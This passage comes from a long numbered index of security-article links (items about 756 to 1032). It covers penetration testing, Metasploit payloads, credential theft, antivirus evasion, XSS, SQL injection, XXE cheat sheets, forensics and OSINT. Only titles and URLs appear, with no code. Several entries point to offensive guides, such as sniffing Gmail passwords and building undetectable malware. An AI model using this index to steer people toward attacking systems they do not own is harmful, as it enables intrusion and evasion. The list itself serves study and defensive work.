http://www.hackingarticles.in/ftp-pivoting-rdp -757-Fun with Metasploit Payloads: http://www.hackingarticles.in/fun-metasploit-payloads -758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC: http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc -759-Generating Reverse Shell using Msfvenom (One Liner Payload): http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload -760-Generating Scan Reports Using Nmap (Output Scan): http://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan -761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled): http://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled -762-Hack ALL Security Features in Remote Windows 7 PC: http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc -763-5 ways to Exploit LFi Vulnerability: http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability -764-5 Ways to Directory Bruteforcing on Web Server: http://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server -765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit -766-Hack Gmail and Facebook Password in Network using Bettercap: http://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap -767-ICMP Penetration Testing: http://www.hackingarticles.in/icmp-penetration-testing -768-Understanding Guide to Mimikatz: http://www.hackingarticles.in/understanding-guide-mimikatz -769-5 Ways to Create Dictionary for Bruteforcing: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing -770-Linux Privilege Escalation using LD_Preload: http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/ -771-2 Ways to Hack Remote Desktop Password using kali Linux: http://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux -772-2 ways to use Msfvenom Payload with Netcat: http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat -773-4 ways to Connect Remote PC using SMB Port: http://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port -774-4 Ways to DNS Enumeration: http://www.hackingarticles.in/4-ways-dns-enumeration -775-4 Ways to get Linux Privilege Escalation: http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation -776-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -777-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -778-OSINT Cheat Sheet: https://hack2interesting.com/osint-cheat-sheet/ -779-OSINT Cheat Sheet: https://infoskirmish.com/osint-cheat-sheet/ -780-OSINT Links for Investigators: https://i-sight.com/resources/osint-links-for-investigators/ -781- Metasploit Cheat Sheet : https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html -782- Exploit Development Cheat Sheet: https://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4 -783-Building Profiles for a Social Engineering Attack: https://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/ -784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes): https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html -785-Getting the goods with CrackMapExec: Part 2: https://byt3bl33d3r.github.io/tag/crackmapexec.html -786-Bug Hunting Methodology (part-1): https://medium.com/p/91295b2d2066 -787-Exploring Cobalt Strike's ExternalC2 framework: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/ -788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities: https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/ -789-Adversarial Tactics, Techniques & Common Knowledge: https://attack.mitre.org/wiki/Main_Page -790-Bug Bounty — Tips / Tricks / JS (JavaScript Files): https://medium.com/p/bdde412ea49d -791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition): https://medium.com/p/f88a9f383fcc -792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution: https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/ -795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ -800-Capcom Rootkit Proof-Of-Concept: https://www.fuzzysecurity.com/tutorials/28.html -801-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -802-Beginners Guide for John the Ripper (Part 1): http://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -803-Working of Traceroute using Wireshark: http://www.hackingarticles.in/working-of-traceroute-using-wireshark/ -804-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/ -805-4 ways to SMTP Enumeration: http://www.hackingarticles.in/4-ways-smtp-enumeration -806-4 ways to Hack MS SQL Login Password: http://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password -807-4 Ways to Hack Telnet Passsword: http://www.hackingarticles.in/4-ways-to-hack-telnet-passsword -808-5 ways to Brute Force Attack on WordPress Website: http://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website -809-5 Ways to Crawl a Website: http://www.hackingarticles.in/5-ways-crawl-website -810-Local Linux Enumeration & Privilege Escalation Cheatsheet: https://www.rebootuser.com/?p=1623 -811-The Drebin Dataset: https://www.sec.cs.tu-bs.de/~danarp/drebin/download.html -812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else: https://www.slideshare.net/x00mario/es6-en -813-IT and Information Security Cheat Sheets: https://zeltser.com/cheat-sheets/ -814-Cheat Sheets - DFIR Training: https://www.dfir.training/cheat-sheets -815-WinDbg Malware Analysis Cheat Sheet: https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -819-Cheat Sheet for Analyzing Malicious Software: https://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/ -820-Analyzing Malicious Documents Cheat Sheet - Prodefence: https://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/ -821-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -823-Windows Registry Auditing Cheat Sheet: https://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology -824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know: https://kennyvn.com/cheatsheet-useful-bash-commands-linux/ -825-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition): https://securedyou.com/best-kali-linux-commands-terminal-hacking/ -827-Kali Linux Commands Cheat Sheet: https://www.pinterest.com/pin/393431717429496576/ -827-Kali Linux Commands Cheat Sheet A To Z: https://officialhacker.com/linux-commands-cheat-sheet/ -828-Linux commands CHEATSHEET for HACKERS: https://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/ -829-100 Linux Commands – A Brief Outline With Cheatsheet: https://fosslovers.com/100-linux-commands-cheatsheet/ -830-Kali Linux – Penetration Testing Cheat Sheet: https://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/ -831-Basic Linux Terminal Shortcuts Cheat Sheet : https://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/ -832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} : https://itechhacks.com/kali-linux-and-linux-commands/ -833-Transferring files from Kali to Windows (post exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux: https://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet -835-What is penetration testing? 10 hacking tools the pros use: https://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html -836-Best Hacking Tools List for Hackers & Security Professionals in 2019: https://gbhackers.com/hacking-tools-list/ -837-ExploitedBunker PenTest Cheatsheet: https://exploitedbunker.com/articles/pentest-cheatsheet/ -838-How to use Zarp for penetration testing: https://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/ -839-Wireless Penetration Testing Cheat Sheet; https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ -840-Pentest Cheat Sheets: https://www.cheatography.com/tag/pentest/ -841-40 Best Penetration Testing (Pen Testing) Tools in 2019: https://www.guru99.com/top-5-penetration-testing-tools.html -842-Metasploit Cheat Sheet: https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -843-OSCP useful resources and tools; https://acknak.fr/en/articles/oscp-tools/ -844-Pentest + Exploit dev Cheatsheet: https://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/ -845-What is Penetration Testing? A Quick Guide for 2019: https://www.cloudwards.net/penetration-testing/ -846-Recon resource: https://pentester.land/cheatsheets/2019/04/15/recon-resources.html -847-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -848-Recon Cheat Sheets: https://www.cheatography.com/tag/recon/ -849-Penetration Testing Active Directory, Part II: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ -850-Reverse-engineering Cheat Sheets: https://www.cheatography.com/tag/reverse-engineering/ -851-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows -853-PROPagate: http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/ -854-Process Doppelgänging, by Tal Liberman and Eugene Kogan:: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf -855-Gargoyle: https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html -856-GHOSTHOOK: https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/ -857-Learn C: https://www.programiz.com/c-programming -858-x86 Assembly Programming Tutorial: https://www.tutorialspoint.com/assembly_programming/ -859-Dr. Paul Carter's PC Assembly Language: http://pacman128.github.io/pcasm/ -860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration: http://opensecuritytraining.info/IntroX86.html -861-x86 Disassembly: https://en.wikibooks.org/wiki/X86_Disassembly -862-use-of-dns-tunneling-for-cc-communications-malware: https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ -863-Using IDAPython to Make Your Life Easier (Series):: https://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/ -864-NET binary analysis: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/ -865-detailed analysis of the BlackEnergy3 big dropper: https://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/ -866-detailed analysis of Uroburos rootkit: https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg -867-TCP/IP and tcpdump Pocket Reference Guide: https://www.sans.org/security-resources/tcpip.pdf -868-TCPDUMP Cheatsheet: http://packetlife.net/media/library/12/tcpdump.pdf -869-Scapy Cheatsheet: http://packetlife.net/media/library/36/scapy.pdf -870-WIRESHARK DISPLAY FILTERS: http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf -871-Windows command line sheet: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf -872-Metasploit cheat sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf -873-IPv6 Cheatsheet: http://packetlife.net/media/library/8/IPv6.pdf -874-IPv4 Subnetting: http://packetlife.net/media/library/15/IPv4_Subnetting.pdf -875-IOS IPV4 ACCESS LISTS: http://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf -876-Common Ports List: http://packetlife.net/media/library/23/common_ports.pdf -877-WLAN: http://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf -878-VLANs Cheatsheet: http://packetlife.net/media/library/20/VLANs.pdf -879-VoIP Basics CheatSheet: http://packetlife.net/media/library/34/VOIP_Basics.pdf -880-Google hacking and defense cheat sheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf -881-Nmap CheatSheet: https://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0 -882-Netcat cheat sheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf -883-PowerShell cheat sheet: https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf -884-Scapy cheat sheet POCKET REFERENCE: https://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf -885-SQL injection cheat sheet.: https://information.rapid7.com/sql-injection-cheat-sheet-download.html -886-Injection cheat sheet: https://information.rapid7.com/injection-non-sql-cheat-sheet-download.html -887-Symmetric Encryption Algorithms cheat sheet: https://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/ -888-Intrusion Discovery Cheat Sheet v2.0 for Linux: https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf -889-Intrusion Discovery Cheat Sheet v2.0 for Window: https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf -890-Memory Forensics Cheat Sheet v1.2: https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf -891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH: https://www.sans.org/brochure/course/log-management-in-depth/6 -892-Evidence collection cheat sheet: https://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf -893-Hex file and regex cheat sheet v1.0: https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf -894-Rekall Memory Forensic Framework Cheat Sheet v1.2.: https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf -895-SIFT WORKSTATION Cheat Sheet v3.0.: https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf -896-Volatility Memory Forensic Framework Cheat Sheet: https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf -897-Hands - on Network Forensics.: https://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf -898-VoIP Security Vulnerabilities.: https://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036 -899-Incident Response: How to Fight Back: https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342 -900-BI-7_VoIP_Analysis_Fundamentals: https://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf -901-Bug Hunting Guide: cybertheta.blogspot.com/2018/08/bug-hunting-guide.html -902-Guide 001 |Getting Started in Bug Bounty Hunting: https://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun... -903-SQL injection cheat sheet : https://portswigger.net › Web Security Academy › SQL injection › Cheat sheet -904-RSnake's XSS Cheat Sheet: https://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/ -905-Bug Bounty Tips (2): https://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/ -906-A Review of my Bug Hunting Journey: https://kongwenbin.com/a-review-of-my-bug-hunting-journey/ -907-Meet the First Hacker Millionaire on HackerOne: https://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/ -908-XSS Cheat Sheet: https://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/ -909-Bug Bounty Hunter Methodology: https://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016 -910-#10 Rules of Bug Bounty: https://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c -911-Bugbounty Checklist: https://www.excis3.be/bugbounty-checklist/21/ -912-FireBounty | The Ultimate Bug Bounty List!: https://firebounty.com/ -913-Brutelogic xss cheat sheet 2019: https://brutelogic.com.br/blog/ebook/xss-cheat-sheet/ -914-XSS Cheat Sheet by Rodolfo Assis: https://leanpub.com/xss -915-Cross-Site-Scripting (XSS) – Cheat Sheet: https://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/ -916-XSS Cheat Sheet V. 2018 : https://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/ -917-Cross-site Scripting Payloads Cheat Sheet : https://exploit.linuxsec.org/xss-payloads-list -918-Xss Cheat Sheet : https://www.in-secure.org/tag/xss-cheat-sheet/ -919-Open Redirect Cheat Sheet : https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html -920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet: https://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php -921-XSS Cheat Sheet: https://tools.paco.bg/13/ -922-XSS for ASP.net developers: https://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers -923-Cross-Site Request Forgery Cheat Sheet: https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/ -924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet : https://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee... -926-Guide to CSRF (Cross-Site Request Forgery): https://www.veracode.com/security/csrf -927-Cross-site Request Forgery - Exploitation & Prevention: https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/ -928-SQL Injection Cheat Sheet : https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -929-MySQL SQL Injection Practical Cheat Sheet: https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/ -930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection: https://www.checkmarx.com/knowledge/knowledgebase/SQLi -931-SQL injection attacks: A cheat sheet for business pros: https://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/ -932-The SQL Injection Cheat Sheet: https://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon -933-SQL Injection Cheat Sheet: https://resources.infosecinstitute.com/sql-injection-cheat-sheet/ -934-Comprehensive SQL Injection Cheat Sheet: https://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/ -935-MySQL SQL Injection Cheat Sheet: pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet -936-SQL Injection Cheat Sheet: MySQL: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/ -937- MySQL Injection Cheat Sheet: https://www.asafety.fr/mysql-injection-cheat-sheet/ -938-SQL Injection Cheat Sheet: https://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/ -939-Google dorks cheat sheet 2019: https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -940-Command Injection Cheatsheet : https://hackersonlineclub.com/command-injection-cheatsheet/ -941-OS Command Injection Vulnerability: https://www.immuniweb.com/vulnerability/os-command-injection.html -942-OS Command Injection: https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection -943-Command Injection: The Good, the Bad and the Blind: https://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/ -944-OS command injection: https://portswigger.net › Web Security Academy › OS command injection -945-How to Test for Command Injection: https://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html -946-Data Exfiltration via Blind OS Command Injection: https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection -947-XXE Cheatsheet: https://www.gracefulsecurity.com/xxe-cheatsheet/ -948-bugbounty-cheatsheet/xxe.: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md -949-XXE - Information Security: https://phonexicum.github.io/infosec/xxe.html -950-XXE Cheat Sheet: https://www.hahwul.com/p/xxe-cheat-sheet.html -951-Advice From A Researcher: Hunting XXE For Fun and Profit: https://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/ -952-Out of Band Exploitation (OOB) CheatSheet : https://www.notsosecure.com/oob-exploitation-cheatsheet/ -953-Web app penentration testing checklist and cheatsheet: www.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example -954-Useful Resources: https://lsdsecurity.com/useful-resources/ -955-Exploiting XXE Vulnerabilities in IIS/.NET: https://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti... -956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE: https://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/ -957-Hacking Resources: https://www.torontowebsitedeveloper.com/hacking-resources -958-Out of Band XML External Entity Injection: https://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio... -959-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -960-Blog - Automated Data Exfiltration with XXE: https://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html -961-My Experience during Infosec Interviews: https://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8 -962-Top 10 Security Risks on the Web (OWASP): https://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t... -963-Antivirus Evasion Tools [Updated 2019] : https://resources.infosecinstitute.com/antivirus-evasion-tools/ -964-Adventures in Anti-Virus Evasion: https://www.gracefulsecurity.com/anti-virus-evasion/ -965-Antivirus Bypass Phantom Evasion - 2019 : https://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/ -966-Antivirus Evasion with Python: https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 -967-Windows oneliners to get shell: https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -968-Does Veil Evasion Still Work Against Modern AntiVirus?: https://www.hackingloops.com/veil-evasion-virustotal/ -969-Google dorks cheat sheet 2019 : https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -970-Malware Evasion Techniques : https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques -971-How to become a cybersecurity pro: A cheat sheet: https://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/ -972-Bypassing Antivirus With Ten Lines of Code: https://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html -973-Bypassing antivirus detection on a PDF exploit: https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit -974-Generating Payloads & Anti-Virus Bypass Methods: https://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/ -975-Apkwash Android Antivirus Evasion For Msfvemon: https://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/ -976-Penetration Testing with Windows Computer & Bypassing an Antivirus: https://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus -978-Penetration Testing: The Quest For Fully UnDetectable Malware: https://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware -979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework : https://githacktools.blogspot.com -980-Creating an undetectable payload using Veil-Evasion Toolkit: https://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/ -981-Evading Antivirus : https://sathisharthars.com/tag/evading-antivirus/ -982-AVPASS – All things in moderation: https://hydrasky.com/mobile-security/avpass/ -983-Complete Penetration Testing & Hacking Tools List: https://cybarrior.com/blog/2019/03/31/hacking-tools-list/ -984-Modern red teaming: 21 resources for your security team: https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team -985-BloodHound and CypherDog Cheatsheet : https://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/ -986-Redteam Archives: https://ethicalhackingguru.com/category/redteam/ -987-NMAP Commands Cheat Sheet: https://www.networkstraining.com/nmap-commands-cheat-sheet/ -988-Nmap Cheat Sheet: https://dhound.io/blog/nmap-cheatsheet -989-Nmap Cheat Sheet: From Discovery to Exploits: https://resources.infosecinstitute.com/nmap-cheat-sheet/ -990-Nmap Cheat Sheet and Pro Tips: https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/ -991-Nmap Tutorial: from the Basics to Advanced Tips: https://hackertarget.com/nmap-tutorial/ -992-How to run a complete network scan with OpenVAS; https://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/ -993-Nmap: my own cheatsheet: https://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/ -994-Top 32 Nmap Command Examples For Linux Sys/Network Admins: https://www.cyberciti.biz/security/nmap-command-examples-tutorials/ -995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker: https://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html -996-Scanning Tools: https://widesecurity.net/kali-linux/kali-linux-tools-scanning/ -997-Nmap - Cheatsheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/ -998-Linux for Network Engineers: https://netbeez.net/blog/linux-how-to-use-nmap/ -999-Nmap Cheat Sheet: https://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/ -1000-Tactical Nmap for Beginner Network Reconnaissance: https://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss... -1001-A Guide For Google Hacking Database: https://www.hackgentips.com/google-hacking-database/ -1002-2019 Data Breaches - The Worst Breaches, So Far: https://www.identityforce.com/blog/2019-data-breaches -1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills: https://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills -1004-Google Hacking Master List : https://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408 -1005-Smart searching with googleDorking | Exposing the Invisible: https://exposingtheinvisible.org/guides/google-dorking/ -1006-Google Dorks 2019: https://korben.info/google-dorks-2019-liste.html -1007-Google Dorks List and how to use it for Good; https://edgy.app/google-dorks-list -1008-How to Use Google to Hack(Googledorks): https://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/ -1009-Using google as hacking tool: https://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht... -1010-#googledorks hashtag on Twitter: https://twitter.com/hashtag/googledorks -1011-Top Five Open Source Intelligence (OSINT) Tools: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/ -1012-What is open-source intelligence (OSINT)?: https://www.microfocus.com/en-us/what-is/open-source-intelligence-osint -1013-A Guide to Open Source Intelligence Gathering (OSINT): https://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c -1014-OSINT: How to find information on anyone: https://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56 -1015-What is OSINT? How can I make use of it?: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it -1016-OSINT Tools for the Dark Web: https://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/ -1017-A Guide to Open Source Intelligence (OSINT): https://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php -1018-An Introduction To Open Source Intelligence (OSINT): https://www.secjuice.com/introduction-to-open-source-intelligence-osint/ -1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive: https://www.aptive.co.uk/blog/tls-ssl-security-testing/ -1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]: https://www.exploit-db.com/ghdb/4262/?source=ghdbid -1021-cheat_sheets: http://zachgrace.com/cheat_sheets/ -1022-Intel SYSRET: https://pentestlab.blog/2017/06/14/intel-sysret -1023-Windows Preventive Maintenance Best Practices: http://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/ -1024-An Overview of Storage Devices: http://www.professormesser.com/?p=19367 -1025-An Overview of RAID: http://www.professormesser.com/?p=19373 -1026-How to Troubleshoot: http://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/ -1027-Mobile Device Security Troubleshooting: http://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/ -1028-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1029-Using Wireshark - Display Filter Expressions: https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/ -1030-Decrypting SSL/TLS traffic with Wireshark: https://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/ -1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.: https://onceupon.github.io/Bash-Oneliner/ -1032- Bash One-Liners Explained, Part I: Working with files : 